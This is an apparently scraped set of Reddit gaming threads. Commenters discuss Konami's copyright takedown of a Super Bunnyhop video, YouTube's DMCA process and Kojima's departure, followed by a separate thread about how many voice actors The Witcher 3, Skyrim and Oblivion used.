That's why so many of these takedowns are reversed after a few weeks. If they weren't, the offenders would be in actual violation of the law. That and a lot of them are "fakedowns", people posing as the company or authority. And that's largely an unfortunate result of the Viacom lawsuit. &gt; YouTube's the one with the "shoot first, question later

Groin stab first, remove knife weeks later. And in the meantime, he loses revenue. IINAL, but I wonder if he has a case to sue for damages (whether he can afford to do so is another story.) I think it had footage of P.T. from what people are saying? Grounds are shaky (and bullshit) as fuck. Note to self in case I ever want to make a video go viral: Include footage that may or may not infringe copyright from a stupid company. You have to be big enough that the company notices you in the first place though. Calling it shaky is even too much. Konmai has zero grounds for citing copyright infringement considering Super Bunnyhop's usage of PT footages falls entirely under fair usage laws. &gt; What grounds for copyright infringement could there have been anyways?

There aren't any.  Fair Use laws in the United States *expressly* cover the re-use of copyrighted works for the purpose of analysis and discussion. A lot of the time on Youtube when a company files an infringement claim it is taken down regardless and it is the Youtuber's problem then to fight to prove that it wasn't.   Seriously, what the fuck is going on at Konami at this point? It's like they're trying to memory hole the entirety of their involvement in the gaming industry. They're leaving the industry, simple as that.  Yeah it really seems that way, but it still seems like they are going about it weirdly. If theyre just trying to back out of the gaming industry, why would they go to the entire metal gear backlog and pull kojimas name off it? Granted they reinstated it after public backlash, but still. Yeah, it seems like Konami is going out of their way to agitate people. Why not just quietly release (or cancel, if needed) their current games and make a formal announcement at some point that they are, in fact, leaving the industry to focus on other areas. I kbow theyre at least pulling through with phantom pain. But yeah, i dont see why they arent being more professional about this. It seems like some of the higherups are personally upset with kojima, and are intentionally trying to spite him Haha if they didn't go through with The Phantom Pain I would cry myself to sleep multiple times haha [Hahahaha.. ha....... ha](http://i.imgur.com/daIN2S4.jpg)

MML3 being cancelled I could understand, because it was extremely early in development and it wouldn't have been the best business decision for Capcom to release it (according to them, which I'll give them the benefit of the doubt about). But MGSV? After so long in development? Literally 4 months from release? I don't think I could mentally handle it. I'd be liable to protest or something. I dont know what id do haha. GZ would be a worse tease than pt though Or, like, sell off the gaming segment to another company so they can continue, and Konami makes money...? There was talk of an extremely bitter power struggle at Konami, one which Kojima lost, and this could be a case of the winner trying to twist the knife and show Kojima who is boss. I know about the struggle, but it just seems damn near chlidish to do something like that. Itd be like re-releasing all the alien movies but pulling ridley scotts name off them, just because they wanna make a new one without ridley scott. Even if it sounds ignorant, Japanese companies are just fucking mental! At least the big ones in the entertainment industry. Weirdly. I suppose that's one word for it. Its... more prudent of them than I'd expect.

See rather than explosively cancel all release and completely pull out what they're doing is dialing things down slowly. Soon, I expect, all we'll see from Konami for the non-mobile market is nothing but sequel after sequel because that's safe. That's a guarantee at making money.  [deleted] [deleted] [deleted] Wouldn't it be a better option for them to sell the digital entertainment part to a different company?  It's not doing as well as they use to, but it's not like they're losing money from what I understand. Because they are going to leverage their ip by turning them into gambling machines like they already did with contra and other classics.

They are going to whore out Metal Gear and Castlevania for years to come at pachinko parlours and casinos. :( There has to be an easier way to leave the industry than this though right? What I don't understand is while I love Superbunnyhop's videos the Konami video wasn't really viral. The dude only has 100K subscribers (which is criminal if you ask me he deserves so much more) so why the takedown? Who actually thought this was a threat or harming Konami's image? If anything now more people are going to hear about this and try and find mirror links and hell maybe get George more attention than he ever would have gotten. I just don't understand whoever filed the takedown what they were thinking? If the video had views in the millions maybe I would understand but from what I remember the video wasn't as viral as it should have been.  The funny thing is that since the DMCA, it will attract more people to watch the video than before. In this day and age, I don't understand people that think this sort of crowd control works Youtube should have a link to: http://en.wikipedia.org/wiki/Streisand_effect right before you file a DMCA with a note saying that if the DMCA is illegitimate it will attract more attention and that a DMCA is not an effective way to censor a video. This comment chain exists in every thread reporting on someone censoring content online. Usually as the top comments. Still, companies never learn.  The big companies only answer to money, if an action would cost them a lot then they would stop do it. Sadly there will never be any fines or anything for false DMCAs on youtube. They generally care about PR as well. Good PR can correlate to good sales, and vice-versa.  This is Konami we are talking about, they wouldn't know what good PR is even if it hit them in the face. Plus, if they are on their way to downplay their video game business ventures they probably wouldn't give two shits about PR. 

Metal Gear, Castlevania, Silent Hill. Just churn out shit sequel after shit sequel. The massess will eat it up. 

After all... look at CoD. Battlefield. I hope this whole thread realizes it's a self-realizing claim. So because you've heard of it and its become popular after an attempted censoring = Streisand effect is real in all cases in these kinds of attempts.

But, of course, you haven't heard of any of the times it has worked and it has been effective and something has been smothered before it reached any kind of critical mass. How many times does this form of censorship work, for the number of times we hear about it? Unfortunately, I think it may be quite effective. Where else can I watch it? I've already seen it, but if it's available elsewhere, that gives me some hope. I like his videos a lot, and I'd like to see them preserved and available to others.  https://youtube.com/watch?v=YNSVhbsJyDQ video
https://www.youtube.com/user/bunnyhopshow channel I'm actually happy that this happened because it will probably give George's channel a significant boost in publicity. I had never heard of him before, but I just subscribed and am trying to track down that video. This reminds me of when Sega did a false DMCA on Totalbiscuit when he was playing the shining force games. False DMCA is illegal and Konami should be punished for that shit but i doubt they ever will be unfortunately.  Sega DMCAed Shining Force across all of youtube shutting many channels down completely as part of a marketing campaign for their next game. I believe they wanted their trailers to be the top search results. They still have not lifted the strikes. Yeah i heard about that and Sega can go fuck itself for doing that shit. They shutdown tons of channels and probably ruined people's entire youtube careers just for some marketing campaign bullshit and they never faced any legal consequences. Even Ubisoft isn't dumb enough to do that shit and Ubisoft is a pretty corrupt company.  TB *still* refuses to mention any Sega games as a result. They were essentially blacklisted by the biggest gaming youtuber because they're idiots. He's said multiple times all they have to do is apologize and he'll cover their games again, yet it's been years and still nothing.  I'll let you in on a secret: I don't think SEGA cares. Sega Japan doesn't care. The folks at Creative Assembly and Relic care but can't do anything.  Will nobody think of the second parties?!  Seriously. Relic is awesome.  It doesn't even make sense from a business perspective why Sega wouldn't apologize to TB. Sega seriously fucked TB over as well as tons of other channels so they should apologize, and focus on getting all of the channels they shut down back online. Consumers love to hear when businesses own up to their mistakes and fix the problem so they would only be good publicity for Sega plus they'd be able to get TB to cover their games again so they'd be improving their marketing as well. It makes perfect sense why Sega should Apologize and fix the problem but they refuse to do it. It's like Sega is run by a bunch of stubborn children instead of intelligent business men. &gt;when Sega did a false DMCA on Totalbiscuit

Didn't Sega do this to everyone they could, TB included? I recall Sega doing it to everyone for Shining Force. If it's enough to fill out a fucking form to take down someone's video there should also a be form for the defendant, that, if the claim was wrong, enables them to get reimbursed for missed revenue and reputational damage. I agree but unfortunately Youtube's takedown system is pretty shitty and overly favors the company doing the takedown instead of the content creators that keep youtube alive.  100K subscribers is not small.  It's not giant, but it means they are viewed regularly.  I didn't mean it as a bad thing I just meant there are other gaming channels on youtube with much more subscriptions. Case in point Totalbiscuit has over 2 million subscribers. I could see why they would take down a video if TB did it. SuperBunnyhop I felt was always underrated and a little niche.  His videos only get 50,000 views while TB's get double or triple the amount.  It's undoubtedly because he reported on someone from inside the company giving him information he shouldn't have. His source said they were about to fire a lot of people and that the business really sucked along with a bunch of other info. I cannot wait to see what Hideo Kojima will do once he is freed from Konami's utter bullshit. I made a joke with some of my gaming pals that Hideo Kojima could literally walk into any game studio in the world and sit down at a desk and begin working and no one would stop him. He is at that damn level. I wouldn't be surprised if one of the big three (Sony, MS or Nintendo) snatch him up right away for a good first party IP.
 I wouldn't be surprised if he's already hired, and just finishing all his loose ends at Konami. I hope he hangs out with Platinum Games for a bit. I'd love a Kojima-filled game in the spirit of Rising/Bayonetta. I don't think Platinum could afford him unless they had some deal lined up before he got there. He will mostly likely start his own studio though.  Probably, but you also never know; wherever/whatever Kojima's future project is, it probably won't be very hard to find a publisher for it, and a Platinum game with Kojima as director or writer would be a pretty strong pitch for various publishers, I'm sure there are a few who would be willing to help pick up the tab. he actually got a job offer from coffee stain studio's in their new goat simulator  game. I dont think it was serious and more a sign of support and admiration. I'm sure they are leaving the industry, wouldn't be surprised to see an announcement that basically says 'Guess what, series like castlevania, silent hill, metal gear,   they are all dead, you'll never see another one of these games again,' hell, i'd be surprised if they let the IP's just rot and refuse to sell them at this point just to spite us.  That's what i'm seeing from them right now Actually you can look forward to still playing those games in Slot Machine form...

[Look what happened to SNK](https://m.youtube.com/watch?v=F8P6NJ7S5ZM)

Ugh..! They already did that with [Parodius](http://thumbnail.image.rakuten.co.jp/@0_mall/a-pachislo/cabinet/01568455/parodeus.jpg) some time ago.

But hell, most of the people involved in that series are long gone anyways, I'd probably hate a new game, especially if the people who made Otomedius worked on it. That is the shittiest slot machine.  

Related note, though, Williams acquired Bally/Midway, then closed the doors to the pinball business in 1999 to focus solely on slot machines.  Sad times.  Nah. THey'll just continue to milk them all. [Even Metal Gear.](http://www.konami-digital-entertainment.co.jp/en/news/topics/2015/0320/) well you can look forward to things like Mighty No. 9 and the Castlevania "successor" on kickstarter.  It'll suck if those IPs all really die but it's better than nothing.  Might be hard to recreate Metal Gear though. I think we should all remember that, despite what Konami has been doing, they are far from dead and they don't depend on the US video game market. 

They released their 4Q earnings on Friday, and they beat analyst estimates. Their income increased 50% FY15 from FY14. Most of their increase came from mobile games. That's exactly it, they are focused in mobile and what ever the hell else. If you saw the Super Bunnyhop video, they have their fingers in many more pies than one would realise (from a video game perspective).  Yup. So even if they lose all of their US customers, they will be just fine. They're likely bailing on the video game market. Unfortunate decision for people who like their IP (Metal Gear, Castlevania, Silent Hill, etc.) but the quality of these titles aside from Metal Gear has dipped for a really long time and I don't think the IP is powerful enough to lament it as long as a spiritual successor exists.

Iga just released his [Castlevania-successor kickstarter](https://www.kickstarter.com/projects/iga/bloodstained-ritual-of-the-night), I'm sure if Kojima wants he can make a new horror game, etc.

Good riddance to be honest. Do it right or don't do it. They are dead as a console game maker, and that's all which should matter for us. The problem is that they own a lot of franchises people love. Video game IP lawyer here. I deal with DMCA takedowns on a daily basis (sending and fighting against them).

What Konami did here was incredibly stupid, shortsighted, and ineffective, but it wasn't **illegal** as some people here are suggesting. 

Konami probably didn't file a DMCA claim under the penalty of perjury. The first step with YouTube is usually just an informal copyright notice that doesn't involve any penalty of perjury or any other legal requirements. 

Furthermore, even if they did file a DMCA claim, they could probably just say that they were filing it based off of the small amount of their copyrighted content that was actually used in the video. For instance, look at the emails  at 1:06 that are technically copyrightable material. It would be a super weak claim that wouldn't hold up in court, but it would probably be enough to get past the perjury requirement.  The video also contains cutscenes and video from some games (are they Konami games?) - if so, it would be an even stronger basis for not committing perjury. 

What Konami did here was pretty stupid since it's obviously going to bring even more attention to the video (hello Streisand Effect) and will be solved by a simple youtube appeal or DMCA Counterclaim, but not illegal. 

I also wrote about YouTube's copyright takedown process for Gamasutra and how people like Super Bunnyhop can fight the claims: http://gamasutra.com/blogs/StephenMcArthur/20140624/219589/How_to_Beat_a_YouTube_ContentID_Copyright_Claim__What_every_Gamer_and_MCN_Should_Know.php
 [deleted] [deleted] [deleted] [deleted] [deleted] It's pretty easy to get a DCMA takedown notice on a video.  All you have to do is claim to be something you aren't and fill out an electronic form.  Google/Youtube does not put real eyes on any of these until there is a response filed by the person who posted the video, so for all you all may know, *I could be Konami.* And if I remember right, disputing a DMCA gives you a strike on your account if they rule against you. Either Konami is dumb enough to not remember Day One: Garrys Incident or they're hoping that DMCA'ing this sort of thing will buy them time while they burn their company to the ground.

I honestly don't know which is worse. &gt;while they burn their company to the ground.

They don't give a fuck about video games anymore and want to get out. Do you really believe a company heavily invested in completely different parts than just gaming, and according to rumors starting to profit off of the legalizing of gambling in Japan, will "burn to the ground" because of a Youtube DMCA claim? Yes, a lot of Redditors who are only familiar with how businesses operate from a high school/college student video game consumer's perspective do think that this is a the equivalent of "burning it to the ground". Wouldn't chalk it up only to redditors. A lot of YouTube commenters and even Youtubers themselves completely ignore Konami's refocus on gambling and mobile. Same sort of thing. People on Reddit aren't categorically different from other people who talk about video games online. Or they remembered SEGA which did it and never even had to appologise to the people which got the strikes on their channel. They did have to back out when the channels that had legal help fought back I don't think a lot of people take SEGA seriously anymore Several Youtubers boycotted or boycott SEGA. Though, I don't think that disproves your point. I'm doubtful it's even a significant blip on SEGA's internal statistics.  Are you really under the impression that the Garrys Incident incident made a big enough impact to people outside of relatively small internet message boards? I would almost bet no one has even heard of the game there, let alone the controversy surrounding it. And even then, to have it affect what they do as a company is even more nonsense. As an avid gamer for the last decade plus, what is the "Garrys Incident"? Short form: early access game did not deliver as promised, was called out on it, creator blew up, cue Streisand effect It did much worse than "not deliver as promised". It was one of the worst games ever made. [Heres the video totalbiscuit uploaded explaining what happened](https://www.youtube.com/watch?v=QfgoDDh4kE0)

[And heres his video that was dcma'ed by the developer](https://www.youtube.com/watch?v=KjTa_x3rbJE&amp;feature=iv&amp;src_vid=QfgoDDh4kE0&amp;annotation_id=annotation_2716921017) Getting away from gaming isn't burning your company to the ground when they make more money making Pachinko machines. Actually, what really frightens me about all this is; *this probably won't go the way of Garry's Incident at all. This has the potential to be the opposite.* 

The reason indie developers end up absolutely slaughtered when they attempt this is because they don't have a lot of money; after they issue a false DMCA takedown, the fuse of a time bomb is lit. They have to take the issue to court if they feel they are actually being infringed upon. Since they don't have the money to do that, the argument ends there, and the video comes back shortly after. We've seen this process outlined by Total Biscuit, as well as in the Jimquisition, after enough false claims were made.

Konami absolutely *does* have the money to take this to court if they want to. I'm a new viewer of Super Bunny Hop (I like him a lot, he's very smart), but I'm willing to bet he does not have the funds that Konami does.

If Konami wants this to disappear badly enough, it can. It doesn't matter whether or not whatever they claim is legal or even correct, they only need to threaten it, because random Youtube users can't afford to risk a courtroom brawl any more than an indie game developer with a stick up their ass can. What's the OP going to do about it? the one thing I can see is that SBH has a lot of friends who have bigger channels then him, the TOVG guys who have an office and works with nintendo, Jim Sterling, and TB are all people who like his work and will probably work to try and deal with it. Also Polaris is owned by Disney now, so they have a Megacorp's worth of lawyers to back them up too. &gt;...DMCA'ing this sort of thing will buy them time while they burn their company to the ground.

They are categorically not burning their company into the ground. It seems clear they will produce only 2 core video game properties going forward (MGS &amp; Pro Evolution)

They are more than a games company. Much more even; George's video covered that too. [deleted] [deleted] https://www.youtube.com/watch?v=iMK-kajdgMA

And its back.

Would you look at that. Another case of someone abusing the DMCA system and getting burned by the public. Man. Its real good that this stuff is just isolated and not a consistent trend. I'm going to take this opportunity to say that George (creator of Super Bunnyhop) makes some of the most thoughtful analyses of video games I've ever seen. He doesn't have a schtick like some other reviewers, he's just completely focused on the material of the game and does a fantastic job picking apart mechanics, as well as industry news in general.

It is too bad Konami apparently wants war with such a humble guy. [deleted] This is nuts, I bet it was because Jimquisition mentioned George in one of his videos about Konami. Konami has a big fat hate boner for Jim and probably took out George just because he was mentioned. if thats true its incredible how petty a company can be. [Here is Jim's video right after George's video came out.](https://www.youtube.com/watch?v=ynl4sIFazmM) You can decide for yourself whether you believe Jim or not, but it's the only explanation I can think of that would have brought so much scrutiny to the video on Super Bunny Hop. You know what slowly dissolving the development team and demoting the director before the release means? There will be no post-release support.

I for one will wait at least a few weeks before even thinking about buying the game. Use of the DMCA in this manner is illegal.  It really aggravates me that there are no consequences for abuse. How did the video get back up? Did Youtube help the guy out or did Konami back down? Youtube helped him. They said Konami didn't provide enough information.

https://twitter.com/superbunnyhop/status/597857120604688384 LOL only fucking Konami can be so fucking incompetent they can't even abuse a DMCA takedown properly.  [**@superbunnyhop**](https://twitter.com/superbunnyhop/)

&gt; [2015-05-11 20:13 UTC](https://twitter.com/superbunnyhop/status/597857120604688384)

&gt; Ack! Scratch that! Just got an email from YT themselves saying the strike was "missing required information." Has that ever happened before?

----

^This ^message ^was ^created ^by ^a ^bot

[^[Contact ^creator]](http://www.np.reddit.com/message/compose/?to=jasie3k&amp;amp;subject=TweetsInCommentsBot)[^[Source ^code]](https://github.com/janpetryk/reddit-bot)
 I don't get it, I'm about 2 minutes in and don't see anything Konami can claim as their own content.

Anyone know how they could do this, aside from "Youtube is shit and is 100% automatic, with no checks on validity" ? Mirror - https://www.youtube.com/watch?v=YNSVhbsJyDQ I think the DMCA system need a complete overhaul.  
Maybe once your channel surpasses a certain number of subs (like 100k?) the company has to actually provide proof before they can take down your video.  
 Wouldn't that just penalise the little guy and ensure only the big Youtubers can do what they want? It would certainly benefit the bigger youtubers, but I think the system with the immediate takedown is in place to ensure that there are no people who illegally upload entire movies etc. (it would be pretty bad if a movie is up for a few hours) and bigger channels would probably not do such a thing I don't think the takedown of Bunnyhop video was automated, or else it would have been removed way faster (like the day it was uploaded). Konami saw the thing, didn't like it and filled a complain, abusing the DCMA system, a common thing on Youtube. It's not a "DMCA" system, it's youtube's own system to comply with the DMCA.

False DMCAs have legal repercussions.

False youtube takedowns are essentially a "nyeh nyeh I blocked your video for a month until I don't respond to the objection".

There is no way in hell google could keep up if they tried to have actual people sort through things, even over 100k subscribers. This is why it's automated, if they leave something up they could be found legally responsible as well.

If people want the DMCA changed, write to your representatives, although there is little chance much will happen. Trying to remember if I watched this video and was pretty sad because I wanted to learn more about this situation.  But I did remember watching this video, especially the part about Konami's gambling division and their investment and I'm guessing lobbying for the bill that will make gambling legal in Japan.  That was a "holy shit" moment for me and just screamed shady to me in my own values, as well as hitting me personally with the whole Kojima situation.

MGS:GZ and MGS:TPP are the last games I'm getting from Konami to support Kojima and prove Konami wrong. While I don't think it's immoral for a company to exit an industry they no longer have faith in, it speaks volumes how they are going about it. 

Apparently no one ever told Konami the adage "never burn bridges"  because they seem dead set on cutting ties with nearly everyone that helped them succeed in digital entertainment. 

I really hope the Pachinko money was worth it, especially considering gambling's legality in Japan is still up in the air.  The Streisand Effect in full force.  When will these people learn? In before the Konami code is revealed as an ancient demonic prayer in a forgotten runic language that we've all been unwittingly invoking all these years. Its funny when people act like censorship can only be done by the government, when nowadays we have examples of people and corporations trying this shit all the time. Luckily the internet is leakier than a capsized titanic so it never works.

Its funny, i've heard some silly shit about the Yakuza pressuring Konami to go into gambling more, as they get a bigger cut. It sounds crazy, but then again the Yakuza are into a whole ton of shit over there. That or Kojima was going around flaunting his *big boss* too much. As the world keeps moving on, the line between corporations and government is becoming so thin as to be non-existent. [deleted] DMCA will be used to protect copyrights, they said. And now they are used to silent unpleasants opinions.  What a farce of the USA legal system. Such a shame. People like him put so much effort into their work, only for it be taken away by a damn DMCA. Wtf is wrong with them? Does anyone on YouTube even cover Konami games anymore? What little they have left anyway. Wouldn't you think that, given how businesses operate and how fast people can abandon ship as paying customers that they would see the reactions from their decisions and start course correcting? Hello Streisand effect. Konami just made this small video huge by trying to censor it. Congratulations. Konami, the fuck are you doing? You can be a business without being a whore. /u/cinemasins taught me that. You're pissing off both kojima and the internet? Are you insane? Do you just want it to end? You're not a bank, ok?  You won't be bailed out when you fuck up. Is there a summary somewhere for those of us who haven't seen the original video There's a YouTube mirror elsewhere in the comments here, I recommend watching it, and subscribing to Super Bunnyhop, its an awesome channel. Damn. I remember back in the day when Konami's little intro graphic meant that game we just loaded into the NES/SNES was going to be worth the rental price for the weekend.

Times sure have changed...
 950!? What did Oblivion have, 15 or so total? VA in games has come a long way.

edit: the article states 950 "speaking roles." I'm pretty sure some voice actors must have handled multiple, perhaps many dozens of roles. There weren't 950 voice actors. There were 950 distinct roles. That makes more sense because I swear every other male was Warden Blackwall from DA:I. they got Tywin Lannister to do the emperor. here's the [list](http://www.imdb.com/title/tt2993508/fullcredits?ref_=tt_cl_sm#cast) Charles Dance is so good at playing royalty. he's a fkn boss Damn 77 voice actors still? Most doing a single character, just wow. Yeah, great thing I love Blackwall's voice. Dude has one of the best "medieval asshole" voices ever. I often just walk around my house talking like Blackwall. "Guess the Wardens forgot to vacuum again, fucking Darkspawn" Hey man, if you can pull of at least a half-decent Blackwall, I won't judge. Is he also the nights watch trainer guy in the telltale game of thrones? Here in the UK he seems to be getting more non-game work - specifically lots of Sky Sports adverts. It's a bit odd hearing boxing advertised by the man who broke my heart. I mean... my inquisitor's heart. 

Ahem. Is that the same guy as the "advice head in a box" in RTW:2?  Guy has a booming, shakespearian voice that's really excellent..but its so excellent its impossible to not recognize he's about 10% of male characters in the game. It sure has, Oblivion had [18 VA](http://www.uesp.net/wiki/Oblivion:Voice_Actors) and Skyrim had [over 70.](http://www.uesp.net/wiki/Skyrim:Voice_Actors) [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] You couldn't really tell in Skyrim though. I remember one example with the Thieves Guild questline, the main villain has that voice actor with the raspy voice, just after talking to him you are tasked with talking to someone who can help bring him down, and this new guy has the same voice actor. Then you talk to someone else in the same or the next quest with the same voice actor. And then Belethor in Whiterun has the same voice actor too. I really think they used only a few voice actors for most characters and used a bunch for just special characters. The worst were the beggars for me. They'd beg with an East London accent, and then move to a doddery old lady if you say anything else to them. Honestly if they had just instituted a random pitch and timbre adjustment for all the 'throwaway' actors that would just tweak it a HAIR it would help.

But the real solution is hiring more voice actors. Bethesda makes fucking tons of cash off the Elder Scrolls games, but they seemingly refuse to actually reinvest it INTO THE GAMES. They're all still ugly when they come out, have shit writing, poor animations, and the same five voice actors they had in their last game. &gt; They're all still ugly when they come out, have shit writing, poor animations, and the same five voice actors they had in their last game.

Been noticing a lot of Skyrim hate on Reddit over the last few months, and I don't fully understand why. It is almost universally regarded as one of the best games of all time...can we really pick it apart and call it shit so easily? 

Skyrim definitely wasn't ugly at the time of its release, nor is it now. It was never Crysis 3, but it didn't pretend to be either. Even if it was middle of the pack graphically, that's by no means ugly. Same with writing. Bethesda games can struggle with pacing because of the open world design, but there are plenty of interesting and engaging quests in Skyrim. Even if we say that, on average, the writing in Skyrim was fairly mediocre, that's a far cry from "shit". 

Anyway, you're entitled to an opinion of course. But I find it hard to justify such a hyperbolic critique of Skyrim. Maybe the game wasn't to your tastes. But was it a poorly made cash grab as you're suggesting? Definitely not.  After playing it daily for 4 years, the fault really start to become apparant. Such trash! This is exactly the actual problem here. People put x-hundred hours into Skyrim and then say "oh, what a garbage game." It has definite faults, and things that grate on me, but god damn if it doesn't still pull me in. I can get lost in that game like I can with few others.  2/10, would not play again. Until I pick it up in a month and put another 300 hours in.  &gt; there are plenty of interesting and engaging quests in Skyrim

I've played a lot of Skyrim, and I really do like the game, but I have to disagree there. There were barely any interesting quests, especially compared to Oblivion or Morrowind. The vast majority of quests ended up being "get to the end of this dungeon", and most of those dungeons were filled with nothing but draugr. Even the guild questlines were often like this. There were a few that were done well - the Cidna Mine questline and the Frostflow lighthouse quest come to mind - but for the most part, the quests were very bland.
 Great games deserve to be criticized for their flaws. Skyrim is a monolithic game, just fucking awesome. But it has poor balance between Mage/Melee combat (high end Melee is just way better than being a Mage). The stealth elements could be better. The intro is drawn out and clashes with the open world environment of the game. And of course the endless bugs on and after launch. 

Great game, obviously has flaws. We're seeing more of those flaws be discussed because the game is getting older and not everyone looks at everything through rose tinted glasses even if they love it.  &gt; We're seeing more of those flaws be discussed because the game is getting older and not everyone looks at everything through rose tinted glasses even if they love it.

That's a fair point. But many of these criticisms don't come in the same form as your post (i.e. "Skyrim is a great game, *but*...), and are completely out of proportion with the reality of things. That's what I'm objecting too. These over-the-top claims that Skyrim is completely garbage. 

No game is perfect, and Skyrim especially. It launched with more than its fair share of flaws, some of which mods can't even fix. But the game isn't broken. It isn't "borderline unplayable". No single element of it is "complete trash". These are incredible exaggerations that add no value to worthwhile discussions about the game. 

Obviously we can cut out the praising bit if we're critiquing the game. You don't need to pay Skyrim a compliment before you point out a flaw. But it's the hyperbole that is the problem in these discussions. Probably because Skyrim is so popular and well-respected, people feel the need to pretend like its the worst and most overrated game of all time when they critique it. And that's not fair to anyone. It discredits the complaint of the poster, and it devalues earnest discussions about the game.  Is it really universally regarded as one of the best games of all time? I've heard that particular opinion very rarely. Most people I've talked to found it pretty boring and disappointing, preferring the other games in the series to Skyrim. Depending on how much stock you give to ratings, according to metacritic Skyrim is tied for 3rd best of all time on Xbox 360, 9th best game of all time on PC, and ranks 21st for PS3 (probably reflecting the poor quality of the port, but still no slouch of a score at 92/100). By all accounts that is universal critical accliam.

Let's say that review scores are biased though, and padded by outlets that give out a lot of 10/10's for major releases. Skyrim is still the [~25th best selling game of all time](http://en.wikipedia.org/wiki/List_of_best-selling_video_games), and would likely rank higher on that list if we disqualified games bundled with consoles, etc. 

But lets say that sales don't justify how good a game is and look at how frequently the game is played instead. At the time of this post, [Skyrim ranked as the 10th most popular game on Steam with over 38,000 players](http://store.steampowered.com/stats/). *And this is for a game that was released in 2011*. Even the Witcher 3, which has similarly been showered with accolades since it launched last week, only ranks 5th on that list, with about 63,000 players. Only 3 games on that list are older than Skyrim: Team Fortress 2, Civilization 5, and Garry's mod. And I'd say that the first 2 of those 3 games equally qualify for "classic" status, not unlike Skyrim. 

Let's not forget that Skyrim is singleplayer too, with no online component. So while we might ascribe its enduring popularity to its active mod community, let's not forget that this is probably the most successful singleplayer game of the past 5 years, and note that it's stayed alive and culturally relevant despite refraining from the usual tactics to keep players tethered to the game. 

**TL;DR: Yeah, I'd say it is pretty easy to substantiate Skyrim's status as one of the best games of all time. Almost by any criteria, be it financial, critical, or cultural impact, Skyrim sits near the top on just about any list**   Skyrim wasn't all that bad looking when it came out. I think you overestimate what console games looked like 4 years ago if you think that.

I totally agree about the pitch and timbre adjustment, though; it's something I've thought about before and I don't see why games don't try that. If you hire talented voice actors who can do different types of voices, you should be able to get a ton of different sounding characters out of one guys voice. [deleted] Nah, Karliah had a very distinctive voice, as did most important characters. and Arnold Schwarzenegger [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] And Farkas! Don't forget Farkas! The voice actor is my best friends uncle. He signed a picture of a screenshot of Farkas and called me on the phone to tell me I'm a whelp for my birthday.  Thanksgiving must be interesting for your friend. Everyone is gathered around the table when suddenly:

"Some people don't think I'm smart. Those people get my fist. But you, I like." They got Max Von Sydow for that blade guy who's name escapes me. Esburn. But his voice seems to change completely half way through or something...dunno if it was an actor or vocal change [deleted] [deleted] [deleted] Syria had 70?! More like 5 &gt; Syria had 70?!

That's an interesting autocorrect. Haha just upgraded my phone. Still have to struggle to type duck Wait, duck or duck? Does "speaking role" really translate to voice actor? Because the latter is not mentioned in the game. There is definitely a massive amount of voice actors in the game and I haven't noticed any obvious duplicas (like the actor in Skyrim who did Farkas and every other nord), but I guess that "speaking role" means NPC with unique dialogue rather than voice actors. &gt; and I haven't noticed any obvious duplicas

There's that peasant guy that sounds like he has throat cancer, the one that tells Keira how ill their cow is when you first go to her house, pretty sure I've heard him a few times The really throaty guy who sounds like Ralph Ineson? The game is fully voiced in 7 languages. I assume you can divide the voice actors at least on that number. I don't get why everyone is arguing over this when there are freaking credits in the game.

Here are the credits, time tagged at the voice acting part, starting with english.

https://youtu.be/3LJj2cY3FZ8?t=304

Maybe it took 950 people total for ALL languages. Hmm, it lists 19 voice actors for the English localization, and 8 additional actors under "Additional Voice Overs (Trolls)" at 7:20.

Anyone notice any other English VO credits?

edit: Looks like 7 languages with voice actors, for a possible total of 141 voice actors.  I'm not seeing any additional voice actor credits. [Polish website about actors](http://www.filmweb.pl/videogame/Wied%C5%BAmin+3%3A+Dziki+Gon-2015-678629/cast/actors) shows 39 actors in Polish version and 25 in English. It's 3rd party source and it's possible the list isn't full. Yeah but one good voice actor can fulfill dozens of different roles. Like 80% of the characters on the Simpsons are voiced by two guys. Grey DeLisle has done like 300 roles.

The voice actors in Elder Scrolls games sound like they aren't even professional voice actors. They just do some silly accent in their normal speaking voice and that's all they know what to do.

  There's this voice which I'm 95% sure is Ralph Ineson, and I hear him all over the place. That's actually my biggest gripe. I hear that guy absolutely everywhere. I've no idea if it is Ralph Ineson but it sounds bang on exactly like him.

The other big problem I have with W3 is I see a LOT of the same faces. They almost always have different hair or whatever, but it's copy/paste the same face and it really takes me out of the game partially because W3 is a really well rendered and realized world and minor things like hearing the same voice actor repeatedly or seeing the same faces on different people is really jarring.

Brilliant game though. Seriously loving every minute. I saw that "950 actors" line and I burst out laughing. You can notice repeating voice actors all the time. Practically all skelligers are the same 3 people and there's some guy with a raspy voice that seemed to voice the entirety of whoreson's gang and like 90% of velen's and novigrad's peasantry.  Oh god that fucking guy with the raspy voice. I honestly don't mind most VA that use a similar voice for different character, but this fucking guy... It's impossible not to recognize his voice, they really shouldn't give him so many different characters. Let's not excuse Bethesda's pathetically lackluster investment in good writing and voice acting by claiming that VA in games has come a long way. From 15 in oblivion to over 70 voice actors in skyrim. And skyrim is nearly 4 years old. Sounds like a good improvement going on.  I'm really looking forward to what the next Elder Scrolls game can do in a couple years, with modern consoles and computers. There were voice acted games with far more voice actors for smaller and similar size scripts before Oblivion.  And yet they weren't as good or we would be talking about them instead of Oblivion. Or they were just different types of game.  The original "Gabriel Knight" game had a voice cast of about 20 people and that's a tiny game, comparatively speaking. There are many ways in which I could describe Oblivion's voice acting but 'good' is not one of them. How can a script be smaller yet similar size? I can't think of any of these games you seem to know of, except for Kotor maybe, which obviously had a pretty small cast, and used repeated "alien" dialog for  most other things. GTA might be the only game that rivals Elder Scrolls/Bioware RPGs in terms of voice acting, and that game is definitely the exception and far from the rule. For comparison SW:The Old Republic had around 200 voice actors and 200,000 lines. Not sure if there's a number for word count.

